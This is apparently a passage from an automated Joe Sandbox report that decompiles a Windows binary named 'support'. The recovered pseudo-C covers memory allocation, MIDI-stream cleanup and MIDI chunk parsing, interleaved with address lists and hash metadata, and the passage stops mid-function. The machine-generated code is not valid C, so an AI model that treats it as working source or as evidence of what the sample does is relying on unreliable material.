									_t315 =  *(_t221 + 0x14);
									_t296 = _t275 + 0x00000001 | 0x0000000f;
									_v20 = _t315;
									__eflags = _t296 - 0x7fffffff;
									if(__eflags <= 0) {
										_t187 = _t315 >> 1;
										__eflags = _t315 - 0x7fffffff - _t187;
										if(__eflags <= 0) {
											_t188 = _t315 + _t187;
											__eflags = _t296 - _t188;
											_t297 =  <  ? _t188 : _t296;
											__eflags = _t297;
										} else {
											_t297 = 0x7fffffff;
										}
									} else {
										_t297 = 0x7fffffff;
									}
									_t262 =  ~(0 | __eflags > 0x00000000) | _t297 + 0x00000001;
									__eflags = _t262 - 0x1000;
									if(_t262 < 0x1000) {
										__eflags = _t262;
										if(_t262 == 0) {
											_t315 = 0;
											__eflags = 0;
										} else {
											_push(_t262);
											_t198 = E003BE3E1();
											_t275 = _v16;
											_t332 = _t332 + 4;
											_t315 = _t198;
										}
										goto L42;
									} else {
										_t62 = _t262 + 0x23; // 0x23
										_t199 = _t62;
										__eflags = _t199 - _t262;
										_t200 =  <=  ? _t275 | 0xffffffff : _t199;
										_push( <=  ? _t275 | 0xffffffff : _t199);
										_t201 = E003BE3E1();
										_t332 = _t332 + 4;
										__eflags = _t201;
										if(_t201 == 0) {
											L47:
											__imp___invalid_parameter_noinfo_noreturn();
											goto L48;
										} else {
											_t275 = _v16;
											_t64 = _t201 + 0x23; // 0x23
											_t315 = _t64 & 0xffffffe0;
											 *(_t315 - 4) = _t201;
											L42:
											__eflags = _v20 - 0x10;
											 *(_t221 + 0x14) = _t297;
											_t297 = _t315 + _t275;
											 *(_t221 + 0x10) = _t275 + 1;
											_v16 = _t297;
											_push(_t275);
											if(_v20 < 0x10) {
												L48:
												memcpy(_t315, _t221, ??);
												 *_t297 = _a4;
												 *(_t297 + 1) = 0;
												 *_t221 = _t315;
												return _t221;
											} else {
												_t299 =  *_t221;
												memcpy(_t315, _t299, ??);
												_t264 = _v16;
												_t332 = _t332 + 0xc;
												_t195 = _a4;
												 *_t264 = _a4;
												 *((char*)(_t264 + 1)) = 0;
												_t266 = _v20 + 1;
												__eflags = _t266 - 0x1000;
												if(_t266 < 0x1000) {
													L46:
													_push(_t266);
													E003BE78C(_t195, _t299);
													 *_t221 = _t315;
													return _t221;
												} else {
													_t280 =  *(_t299 - 4);
													_t266 = _t266 + 0x23;
													_t297 = _t299 - _t280;
													_t195 = _t297 - 4;
													__eflags = _t297 - 4 - 0x1f;
													if(_t297 - 4 > 0x1f) {
														goto L47;
													} else {
														_t299 = _t280;
														goto L46;
													}
												}
											}
										}
									}
								}
							} else {
								_t229 = _t145 * 8 - _t145 << 2;
								__eflags = _t229 - 0x1000;
								if(_t229 < 0x1000) {
									L21:
									__eflags = _t229;
									if(_t229 == 0) {
										_t319 = 0;
										__eflags = 0;
									} else {
										_push(_t229);
										_t206 = E003BE3E1();
										_t331 = _t331 + 4;
										_t319 = _t206;
									}
								} else {
									_t207 = _t229 + 0x23;
									_t242 = _t242 | 0xffffffff;
									__eflags = _t207 - _t229;
									_t208 =  <=  ? _t242 : _t207;
									_push( <=  ? _t242 : _t207);
									_t209 = E003BE3E1();
									_t331 = _t331 + 4;
									__eflags = _t209;
									if(_t209 == 0) {
										__imp___invalid_parameter_noinfo_noreturn();
										goto L21;
									} else {
										_t40 = _t209 + 0x23; // 0x23
										_t319 = _t40 & 0xffffffe0;
										 *(_t319 - 4) = _t209;
									}
								}
								_v12 = 0;
								asm("xorps xmm0, xmm0");
								_v32 = 0;
								asm("movq [ebp-0x20], xmm0");
								 *0x6f6304 = _t319;
								 *0x6f6308 = _t319;
								 *0x6f630c = _t229 + _t319;
								_v40 = _t319;
								_v36 = _t319;
								_v32 = 0x6f6304;
								_t230 = _v44;
								_v12 = 1;
								while(1) {
									__eflags = _t287 - _t230;
									if(_t287 == _t230) {
										break;
									}
									_t50 = _t319 + 4; // -24
									_t242 = _t50;
									 *_t319 =  *_t287;
									E003B4F40(_t242, _t274, _t287 + 4);
									_t319 = _t319 + 0x1c;
									_t287 = _t287 + 0x1c;
									_v36 = _t319;
								}
								_push(_t242);
								L70();
								 *0x6f6308 = _t319;
								goto L28;
							}
						}
					} else {
						_t233 = _t132 * 8 - _t132 << 2;
						if(_t233 < 0x1000) {
							L6:
							__eflags = _t233;
							if(_t233 == 0) {
								_t321 = 0;
								__eflags = 0;
							} else {
								_push(_t233);
								_t214 = E003BE3E1();
								_t330 = _t330 + 4;
								_t321 = _t214;
							}
						} else {
							_t215 = _t233 + 0x23;
							_t236 = _t236 | 0xffffffff;
							_t216 =  <=  ? _t236 : _t215;
							_push( <=  ? _t236 : _t215);
							_t217 = E003BE3E1();
							_t330 = _t330 + 4;
							if(_t217 == 0) {
								__imp___invalid_parameter_noinfo_noreturn();
								goto L6;
							} else {
								_t13 = _t217 + 0x23; // 0x23
								_t321 = _t13 & 0xffffffe0;
								 *((intOrPtr*)(_t321 - 4)) = _t217;
							}
						}
						_v8 = 0;
						asm("xorps xmm0, xmm0");
						_v28 = 0;
						asm("movq [ebp-0x20], xmm0");
						 *0x6f6310 = _t321;
						 *0x6f6314 = _t321;
						 *0x6f6318 = _t321 + _t233;
						_v36 = _t321;
						_v32 = _t321;
						_v28 = 0x6f6310;
						_t234 = _v40;
						_v8 = 1;
						while(_t285 != _t234) {
							_t23 = _t321 + 4; // -24
							_t236 = _t23;
							 *_t321 =  *_t285;
							E003B4F40(_t236, _t271, _t285 + 4);
							_t321 = _t321 + 0x1c;
							_t285 = _t285 + 0x1c;
							_v32 = _t321;
						}
						_push(_t236);
						L70();
						 *0x6f6314 = _t321;
						goto L13;
					}
				}
				L81:
			}

0x003b56b3
0x003b56b5
0x003b56c0
0x003b56c1
0x003b56c4
0x003b56c9
0x003b56cb
0x003b56ce
0x003b56cf
0x003b56d0
0x003b56d1
0x003b56d5
0x003b56db
0x003b56de
0x003b56e3
0x003b56e6
0x003b56e8
0x003b56f2
0x003b56fe
0x003b5708
0x003b570d
0x003b571a
0x003b571c
0x003b57f2
0x003b57f5
0x003b5803
0x003b580d
0x003b5722
0x003b5727
0x003b5810
0x003b5815
0x003b581a
0x003b581c
0x003b581e
0x003b5823
0x003b5824
0x003b5825
0x003b5826
0x003b5827
0x003b5828
0x003b5829
0x003b582a
0x003b582b
0x003b582c
0x003b582d
0x003b582e
0x003b582f
0x003b5830
0x003b5831
0x003b5833
0x003b5835
0x003b5840
0x003b5841
0x003b5844
0x003b5849
0x003b584b
0x003b584e
0x003b584f
0x003b5850
0x003b5851
0x003b5855
0x003b585b
0x003b585e
0x003b5863
0x003b5866
0x003b5868
0x003b5872
0x003b587e
0x003b5888
0x003b588d
0x003b589a
0x003b589a
0x003b589c
0x003b5972
0x003b5975
0x003b5983
0x003b598d
0x003b58a2
0x003b58a2
0x003b58a7
0x003b5990
0x003b5995
0x003b599a
0x003b599c
0x003b599e
0x003b59a3
0x003b59a4
0x003b59a5
0x003b59a6
0x003b59a7
0x003b59a8
0x003b59a9
0x003b59aa
0x003b59ab
0x003b59ac
0x003b59ad
0x003b59ae
0x003b59af
0x003b59b0
0x003b59b1
0x003b59b3
0x003b59b6
0x003b59b7
0x003b59c0
0x003b59c1
0x003b59c2
0x003b59c7
0x003b59ca
0x003b59cd
0x003b5ade
0x003b5ae3
0x003b5ae4
0x003b5ae5
0x003b5ae6
0x003b5ae7
0x003b5ae8
0x003b5ae9
0x003b5aea
0x003b5aeb
0x003b5aec
0x003b5aed
0x003b5aee
0x003b5aef
0x003b5af0
0x003b5af1
0x003b5af3
0x003b5af9
0x003b5afc
0x003b5b06
0x003b5b07
0x003b5b0c
0x003b5b0f
0x003b5b12
0x003b5b13
0x003b5b15
0x003b5c44
0x003b5c49
0x003b5c4a
0x003b5c4b
0x003b5c4c
0x003b5c4d
0x003b5c4e
0x003b5c4f
0x003b5c50
0x003b5c51
0x003b5c53
0x003b5c54
0x003b5c56
0x003b5c58
0x003b5cab
0x003b5cad
0x003b5c5a
0x003b5c5a
0x003b5c5b
0x003b5c60
0x003b5c60
0x003b5c62
0x003b5c65
0x00000000
0x003b5c67
0x003b5c67
0x003b5c6a
0x003b5c6b
0x003b5c71
0x003b5c85
0x003b5c85
0x003b5c87
0x003b5c8c
0x00000000
0x003b5c73
0x003b5c73
0x003b5c76
0x003b5c7e
0x003b5c81
0x003b5cae
0x003b5cb4
0x003b5cb5
0x003b5cb6
0x003b5cb7
0x003b5cb8
0x003b5cb9
0x003b5cba
0x003b5cbb
0x003b5cbc
0x003b5cbd
0x003b5cbe
0x003b5cbf
0x003b5cc4
0x003b5cc6
0x003b5ccd
0x003b5cd3
0x003b5cda
0x003b5cda
0x003b5cde
0x003b5ce7
0x003b5cf1
0x003b5c83
0x003b5c83
0x00000000
0x003b5c83
0x003b5c81
0x003b5c71
0x00000000
0x003b5c8f
0x003b5c8f
0x003b5c96
0x003b5c9c
0x003b5ca0
0x003b5ca3
0x003b5ca3
0x003b5ca6
0x003b5ca6
0x00000000
0x003b5caa
0x003b5b1b
0x003b5b1b
0x003b5b1e
0x003b5b23
0x003b5b26
0x003b5b29
0x003b5b2c
0x003b5b2e
0x003b5b36
0x003b5b3a
0x003b5b3c
0x003b5b45
0x003b5b47
0x003b5b49
0x003b5b3e
0x003b5b3e
0x003b5b3e
0x003b5b30
0x003b5b30
0x003b5b30
0x003b5b58
0x003b5b5a
0x003b5b60
0x003b5b8c
0x003b5b8e
0x003b5ba0
0x003b5ba0
0x003b5b90
0x003b5b90
0x003b5b91
0x003b5b96
0x003b5b99
0x003b5b9c
0x003b5b9c
0x00000000
0x003b5b62
0x003b5b62
0x003b5b62
0x003b5b68
0x003b5b6a
0x003b5b6d
0x003b5b6e
0x003b5b73
0x003b5b76
0x003b5b78
0x003b5c15
0x003b5c15
0x00000000
0x003b5b7e
0x003b5b7e
0x003b5b81
0x003b5b84
0x003b5b87
0x003b5ba2
0x003b5ba5
0x003b5bab
0x003b5bae
0x003b5bb3
0x003b5bb6
0x003b5bba
0x003b5bbd
0x003b5bbe
0x003b5c1b
0x003b5c1d
0x003b5c29
0x003b5c34
0x003b5c39
0x003b5c41
0x003b5bc0
0x003b5bc0
0x003b5bc4
0x003b5bd2
0x003b5bd7
0x003b5bda
0x003b5be0
0x003b5be1
0x003b5be4
0x003b5bea
0x003b5bfe
0x003b5bfe
0x003b5c00
0x003b5c08
0x003b5c12
0x003b5bec
0x003b5bec
0x003b5bef
0x003b5bf2
0x003b5bf4
0x003b5bf4
0x003b5bf7
0x003b5bfa
0x00000000
0x003b5bfc
0x003b5bfc
0x00000000
0x003b5bfc
0x003b5bfa
0x003b5bea
0x003b5bbe
0x003b5b78
0x003b5b60
0x003b59d3
0x003b59d3
0x003b59d9
0x003b59dc
0x003b59df
0x003b59e1
0x003b59e9
0x003b59ed
0x003b59ef
0x003b59f8
0x003b59fa
0x003b59fc
0x003b59fc
0x003b59f1
0x003b59f1
0x003b59f1
0x003b59e3
0x003b59e3
0x003b59e3
0x003b5a0b
0x003b5a0d
0x003b5a13
0x003b5a3f
0x003b5a41
0x003b5a53
0x003b5a53
0x003b5a43
0x003b5a43
0x003b5a44
0x003b5a49
0x003b5a4c
0x003b5a4f
0x003b5a4f
0x00000000
0x003b5a15
0x003b5a15
0x003b5a15
0x003b5a1b
0x003b5a1d
0x003b5a20
0x003b5a21
0x003b5a26
0x003b5a29
0x003b5a2b
0x003b5ab8
0x003b5ab8
0x00000000
0x003b5a31
0x003b5a31
0x003b5a34
0x003b5a37
0x003b5a3a
0x003b5a55
0x003b5a55
0x003b5a5c
0x003b5a5f
0x003b5a62
0x003b5a65
0x003b5a68
0x003b5a69
0x003b5abe
0x003b5ac0
0x003b5acb
0x003b5acf
0x003b5ad3
0x003b5adb
0x003b5a6b
0x003b5a6b
0x003b5a6f
0x003b5a74
0x003b5a77
0x003b5a7a
0x003b5a7d
0x003b5a7f
0x003b5a86
0x003b5a87
0x003b5a8d
0x003b5aa1
0x003b5aa1
0x003b5aa3
0x003b5aab
0x003b5ab5
0x003b5a8f
0x003b5a8f
0x003b5a92
0x003b5a95
0x003b5a97
0x003b5a9a
0x003b5a9d
0x00000000
0x003b5a9f
0x003b5a9f
0x00000000
0x003b5a9f
0x003b5a9d
0x003b5a8d
0x003b5a69
0x003b5a2b
0x003b5a13
0x003b58ad
0x003b58b6
0x003b58b9
0x003b58bf
0x003b58ea
0x003b58ea
0x003b58ec
0x003b58fb
0x003b58fb
0x003b58ee
0x003b58ee
0x003b58ef
0x003b58f4
0x003b58f7
0x003b58f7
0x003b58c1
0x003b58c1
0x003b58c4
0x003b58c7
0x003b58c9
0x003b58cc
0x003b58cd
0x003b58d2
0x003b58d5
0x003b58d7
0x003b58e4
0x00000000
0x003b58d9
0x003b58d9
0x003b58dc
0x003b58df
0x003b58df
0x003b58d7
0x003b58fd
0x003b5907
0x003b590a
0x003b5911
0x003b5916
0x003b591c
0x003b5922
0x003b5927
0x003b592a
0x003b592d
0x003b5934
0x003b5937
0x003b5940
0x003b5940
0x003b5942
0x00000000
0x00000000
0x003b5946
0x003b5946
0x003b5949
0x003b594f
0x003b5954
0x003b5957
0x003b595a
0x003b595a
0x003b595f
0x003b5964
0x003b596c
0x00000000
0x003b596c
0x003b58a7
0x003b572d
0x003b5736
0x003b573f
0x003b576a
0x003b576a
0x003b576c
0x003b577b
0x003b577b
0x003b576e
0x003b576e
0x003b576f
0x003b5774
0x003b5777
0x003b5777
0x003b5741
0x003b5741
0x003b5744
0x003b5749
0x003b574c
0x003b574d
0x003b5752
0x003b5757
0x003b5764
0x00000000
0x003b5759
0x003b5759
0x003b575c
0x003b575f
0x003b575f
0x003b5757
0x003b577d
0x003b5787
0x003b578a
0x003b5791
0x003b5796
0x003b579c
0x003b57a2
0x003b57a7
0x003b57aa
0x003b57ad
0x003b57b4
0x003b57b7
0x003b57c0
0x003b57c6
0x003b57c6
0x003b57c9
0x003b57cf
0x003b57d4
0x003b57d7
0x003b57da
0x003b57da
0x003b57df
0x003b57e4
0x003b57ec
0x00000000
0x003b57ec
0x003b5727
0x00000000

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003B5764
_CxxThrowException.VCRUNTIME140(00000000,00000000,4B5EE95B,?,?), ref: 003B581E

Part of subcall function 003BE3E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(006F5B9C,?,003B5E90,00000000,?,006F5B9C), ref: 003BE3F6

Strings

[^K/, xrefs: 003B56C4

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: ExceptionThrow_invalid_parameter_noinfo_noreturnmalloc
String ID: [^K/
API String ID: 42831207-4166871755
Opcode ID: 4f0f1240d531725c1acf1e1f4f2c9fb0ea609f28cc42d901e3cbc00f29e9393b
Instruction ID: 8cd13396de2766c20d9911d3018934b70d525982962a35a4b428e1a1e83fe9d6
Opcode Fuzzy Hash: 4f0f1240d531725c1acf1e1f4f2c9fb0ea609f28cc42d901e3cbc00f29e9393b
Instruction Fuzzy Hash: 9141D3B2E00608CBDB01DF68DC827EEBBE9EB48704F11462AF515D7681EB706A04CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003B8160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E003B8160(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v12;
				char _v16;
				signed int _v18;
				signed short _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v48;
				intOrPtr _v60;
				void* __ebp;
				signed int _t84;
				void* _t88;
				intOrPtr _t89;
				signed int _t95;
				intOrPtr* _t97;
				signed short _t101;
				signed int _t121;
				intOrPtr _t123;
				void* _t133;
				intOrPtr* _t135;
				signed short _t136;
				intOrPtr _t138;
				signed int _t139;
				signed int _t147;
				signed int _t164;
				signed int _t167;
				intOrPtr _t170;
				signed int _t172;
				signed int _t173;
				signed char _t174;
				intOrPtr _t176;
				unsigned int _t178;
				intOrPtr _t179;
				intOrPtr _t181;
				intOrPtr _t182;
				signed int _t188;
				signed int* _t191;
				intOrPtr* _t193;
				intOrPtr _t195;
				signed int _t197;
				signed int _t201;

				_t133 = __ebx;
				_push(0xffffffff);
				_push(E003BF980);
				_push( *[fs:0x0]);
				_push(__esi);
				_push(__edi);
				_t84 =  *0x3c500c; // 0x4b5ee95b
				_push(_t84 ^ _t199);
				 *[fs:0x0] =  &_v16;
				_t193 = __ecx;
				 *__ecx = 0x3c1510;
				E003B8460(__ecx, 0);
				_t88 =  *(_t193 + 0x54);
				if(_t88 != 0) {
					CloseHandle(_t88);
				}
				_t181 =  *((intOrPtr*)(_t193 + 0x74));
				if(_t181 == 0) {
					L7:
					_t89 =  *((intOrPtr*)(_t193 + 0x68));
					if(_t89 == 0) {
						L12:
						_t182 =  *((intOrPtr*)(_t193 + 0x5c));
						if(_t182 == 0) {
							L17:
							 *[fs:0x0] = _v16;
							return _t89;
						} else {
							_t169 = 0x2aaaaaab * ( *((intOrPtr*)(_t193 + 0x64)) - _t182) >> 0x20 >> 2;
							_t94 = (0x2aaaaaab * ( *((intOrPtr*)(_t193 + 0x64)) - _t182) >> 0x20 >> 2 >> 0x1f) + _t169;
							_t147 = (0x2aaaaaab * ( *((intOrPtr*)(_t193 + 0x64)) - _t182) >> 0x20 >> 2 >> 0x1f) + _t169 + ((0x2aaaaaab * ( *((intOrPtr*)(_t193 + 0x64)) - _t182) >> 0x20 >> 2 >> 0x1f) + _t169) * 2 << 3;
							if(_t147 < 0x1000) {
								L16:
								_push(_t147);
								_t89 = E003BE78C(_t94, _t182);
								 *((intOrPtr*)(_t193 + 0x5c)) = 0;
								 *((intOrPtr*)(_t193 + 0x60)) = 0;
								 *((intOrPtr*)(_t193 + 0x64)) = 0;
								goto L17;
							} else {
								_t170 =  *((intOrPtr*)(_t182 - 4));
								_t147 = _t147 + 0x23;
								_t181 = _t182 - _t170;
								_t94 = _t181 - 4;
								if(_t181 - 4 > 0x1f) {
									goto L18;
								} else {
									_t182 = _t170;
									goto L16;
								}
							}
						}
					} else {
						_t164 =  *((intOrPtr*)(_t193 + 0x70)) - _t89 & 0xfffffffc;
						if(_t164 < 0x1000) {
							L11:
							_push(_t164);
							_t89 = E003BE78C(_t89, _t89);
							 *((intOrPtr*)(_t193 + 0x68)) = 0;
							_t201 = _t201 + 8;
							 *((intOrPtr*)(_t193 + 0x6c)) = 0;
							 *((intOrPtr*)(_t193 + 0x70)) = 0;
							goto L12;
						} else {
							_t176 =  *((intOrPtr*)(_t89 - 4));
							_t164 = _t164 + 0x23;
							if(_t89 - _t176 + 0xfffffffc > 0x1f) {
								goto L18;
							} else {
								_t89 = _t176;
								goto L11;
							}
						}
					}
				} else {
					_t178 = 0x30c30c31 * ( *((intOrPtr*)(_t193 + 0x7c)) - _t181) >> 0x20 >> 4;
					_t130 = (_t178 >> 0x1f) + _t178;
					_t167 = ((_t178 >> 0x1f) + _t178) * 0x54;
					if(_t167 < 0x1000) {
						L6:
						_push(_t167);
						E003BE78C(_t130, _t181);
						 *((intOrPtr*)(_t193 + 0x74)) = 0;
						_t201 = _t201 + 8;
						 *((intOrPtr*)(_t193 + 0x78)) = 0;
						 *((intOrPtr*)(_t193 + 0x7c)) = 0;
						goto L7;
					} else {
						_t179 =  *(_t181 - 4);
						_t167 = _t167 + 0x23;
						_t181 = _t181 - _t179;
						_t130 = _t181 - 4;
						if(_t181 - 4 > 0x1f) {
							L18:
							__imp___invalid_parameter_noinfo_noreturn();
							asm("int3");
							asm("int3");
							asm("int3");
							_t200 = _t201;
							_t95 =  *0x3c500c; // 0x4b5ee95b
							_v36 = _t95 ^ _t201;
							_t97 = _v24;
							_push(_t133);
							_push(_t193);
							_t195 =  *0x6f6300; // 0x0
							_push(_t181);
							_v48 = _t97;
							_v60 = _t195;
							if( *((intOrPtr*)(_t195 + 8)) != 0 ||  *_t97 != 0x6468544d) {
								L36:
								return E003BE3D0(_v12 ^ _t200);
							} else {
								_t39 = _t97 + 4; // 0x4
								_t135 = _t39;
								asm("bswap eax");
								if( *_t135 != 6) {
									goto L36;
								} else {
									_t101 =  *(_t135 + 4);
									_t136 = _t135 + 0xa;
									_v20 = _t101;
									 *(_t195 + 0xc) = (_t101 & 0xff) << 0x00000008 | (_t101 & 0x0000ffff) >> 0x00000008;
									 *(_t195 + 0x10) = (_v18 & 0xff) << 0x00000008 | (_v18 & 0x0000ffff) >> 0x00000008;
									 *(_t195 + 0x14) = ( *(_t135 + 8) & 0xff) << 0x00000008 | ( *(_t135 + 8) & 0x0000ffff) >> 0x00000008;
									_t197 = _t195 + 0x5c;
									_push(_t197);
									_t154 = _t197;
									E003B96B0(_t136, _t197, (_v18 & 0xff) << 0x00000008 | (_v18 & 0x0000ffff) >> 0x00000008, _t197, (_v18 & 0xff) << 0x00000008 | (_v18 & 0x0000ffff) >> 0x00000008);
									_t188 = _v36;
									_v28 = 0;
									if( *((intOrPtr*)(_t188 + 0x10)) <= 0) {
										L34:
										 *((intOrPtr*)(_t188 + 8)) = _v24;
										 *((intOrPtr*)(_t188 + 4)) = _a4;
										_v24 = 0x64;
										E003B92D0(_t188 + 0x68, _t154,  &_v24);
										if(E003B8EE0(_t136, _t188, _t188, _t197) == 0) {
											goto L36;
										} else {
											return E003BE3D0(_v12 ^ _t200);
										}
									} else {
										_t172 = 0;
										_v32 = 0;
										while( *_t136 == 0x6b72544d) {
											_t154 =  *(_t136 + 4);
											_t138 = _t136 + 8;
											asm("bswap ecx");
											 *(_t172 +  *_t197 + 4) =  *(_t136 + 4);
											 *((intOrPtr*)(_t172 +  *_t197 + 0xc)) = _t138;
											 *((intOrPtr*)(_t172 +  *_t197 + 8)) = _t138;
											_t191 =  *_t197 + _t172;
											_t173 = _t191[1];
											_t136 = _t138 + _t173;
											_v20 = _t136;
											if(_t173 != 0) {
												if(( *_t191 & 0x00000001) == 0) {
													_t121 = _t191[3];
													_t139 = 0;
													while(_t121 - _t191[2] != _t173) {
														_t174 =  *_t121;
														_t121 = _t121 + 1;
														_t154 = _t174 & 0x7f;
														_t139 = _t139 << 0x00000007 | _t174 & 0x7f;
														_t191[3] = _t121;
														if(_t174 >= 0) {
															_t191[4] = _t139;
															_t136 = _v20;
															goto L33;
														} else {
															_t173 = _t191[1];
															continue;
														}
														goto L37;
													}
												}
												goto L36;
											} else {
												 *_t191 =  *_t191 | 0x00000001;
												L33:
												_t188 = _v36;
												_t123 = _v28 + 1;
												_t172 = _v32 + 0x18;
												_v28 = _t123;
												_v32 = _t172;
												if(_t123 <  *((intOrPtr*)(_t188 + 0x10))) {
													continue;
												} else {
													goto L34;
												}
											}
											goto L37;
										}
										goto L36;
									}
								}
							}
						} else {
							_t181 = _t179;
							goto L6;
						}
					}
				}
				L37:
			}

0x003b8160
0x003b8163
0x003b8165
0x003b8170
0x003b8171
0x003b8172
0x003b8173
0x003b817a
0x003b817e
0x003b8184
0x003b8188
0x003b818e
0x003b8193
0x003b8198
0x003b819b
0x003b819b
0x003b81a1
0x003b81a6
0x003b81fe
0x003b81fe
0x003b8203
0x003b824a
0x003b824a
0x003b824f
0x003b82a6
0x003b82a9
0x003b82b6
0x003b8251
0x003b825d
0x003b8265
0x003b826a
0x003b8273
0x003b8287
0x003b8287
0x003b8289
0x003b828e
0x003b8298
0x003b829f
0x00000000
0x003b8275
0x003b8275
0x003b8278
0x003b827b
0x003b827d
0x003b8283
0x00000000
0x003b8285
0x003b8285
0x00000000
0x003b8285
0x003b8283
0x003b8273
0x003b8205
0x003b820a
0x003b8213
0x003b822b
0x003b822b
0x003b822d
0x003b8232
0x003b8239
0x003b823c
0x003b8243
0x00000000
0x003b8215
0x003b8215
0x003b8218
0x003b8223
0x00000000
0x003b8229
0x003b8229
0x00000000
0x003b8229
0x003b8223
0x003b8213
0x003b81a8
0x003b81b4
0x003b81bc
0x003b81be
0x003b81c7
0x003b81df
0x003b81df
0x003b81e1
0x003b81e6
0x003b81ed
0x003b81f0
0x003b81f7
0x00000000
0x003b81c9
0x003b81c9
0x003b81cc
0x003b81cf
0x003b81d1
0x003b81d7
0x003b82b7
0x003b82b7
0x003b82bd
0x003b82be
0x003b82bf
0x003b82c1
0x003b82c6
0x003b82cd
0x003b82d0
0x003b82d3
0x003b82d4
0x003b82d5
0x003b82db
0x003b82dc
0x003b82df
0x003b82e6
0x003b8448
0x003b845a
0x003b82f8
0x003b82f8
0x003b82f8
0x003b82fd
0x003b8302
0x00000000
0x003b8308
0x003b8308
0x003b830f
0x003b8315
0x003b8326
0x003b8343
0x003b8346
0x003b8349
0x003b834c
0x003b834e
0x003b8350
0x003b8355
0x003b8358
0x003b8363
0x003b8405
0x003b8408
0x003b840e
0x003b8419
0x003b8420
0x003b842e
0x00000000
0x003b8430
0x003b8445
0x003b8445
0x003b8369
0x003b8369
0x003b836b
0x003b8370
0x003b837c
0x003b837f
0x003b8384
0x003b8386
0x003b838c
0x003b8392
0x003b8398
0x003b839a
0x003b839d
0x003b839f
0x003b83a4
0x003b83ae
0x003b83b4
0x003b83b7
0x003b83c0
0x003b83c9
0x003b83cb
0x003b83cf
0x003b83d5
0x003b83d7
0x003b83dc
0x003b83e3
0x003b83e6
0x00000000
0x003b83de
0x003b83de
0x00000000
0x003b83de
0x00000000
0x003b83dc
0x003b83c0
0x00000000
0x003b83a6
0x003b83a6
0x003b83e9
0x003b83ec
0x003b83ef
0x003b83f3
0x003b83f6
0x003b83f9
0x003b83ff
0x00000000
0x00000000
0x00000000
0x00000000
0x003b83ff
0x00000000
0x003b83a4
0x00000000
0x003b8370
0x003b8363
0x003b8302
0x003b81dd
0x003b81dd
0x00000000
0x003b81dd
0x003b81d7
0x003b81c7
0x00000000

APIs

Part of subcall function 003B8460: midiStreamStop.WINMM(?,?,?,?,?,?,?,?,?,003B8193,00000000,4B5EE95B,?,?,?,003BF980), ref: 003B84A2

CloseHandle.KERNEL32(?,00000000,4B5EE95B,?,?,?,003BF980,000000FF,?,003B813B), ref: 003B819B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,4B5EE95B,?,?,?,003BF980,000000FF,?,003B813B), ref: 003B82B7

Strings

[^K/, xrefs: 003B8173

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: CloseHandleStopStream_invalid_parameter_noinfo_noreturnmidi
String ID: [^K/
API String ID: 1194316654-4166871755
Opcode ID: 7de662d01b048029200e616939fc068ba244ef55e556be228f84d80892f9a221
Instruction ID: c07b8382fd03b68df081e9afd802e1ba740aa181a7b6ca0485723933e7c28151
Opcode Fuzzy Hash: 7de662d01b048029200e616939fc068ba244ef55e556be228f84d80892f9a221
Instruction Fuzzy Hash: A841A472600A048FD71E8F28CD59BAAB7E9EB84708F144A1DE6528BF95DB74F844CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003BD5A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E003BD5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v16;
				long _v20;
				signed int _v24;
				signed int _t37;
				signed int _t40;
				intOrPtr _t46;
				int _t48;
				intOrPtr* _t49;
				signed int _t53;
				signed int _t61;
				intOrPtr _t65;
				intOrPtr* _t70;
				void* _t73;
				signed int _t76;
				signed int _t78;

				_t78 = (_t76 & 0xfffffff8) - 0x14;
				_t37 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t37 ^ _t78;
				_push(__esi);
				_t73 = __ecx;
				_push(__edi);
				_t70 = _a4;
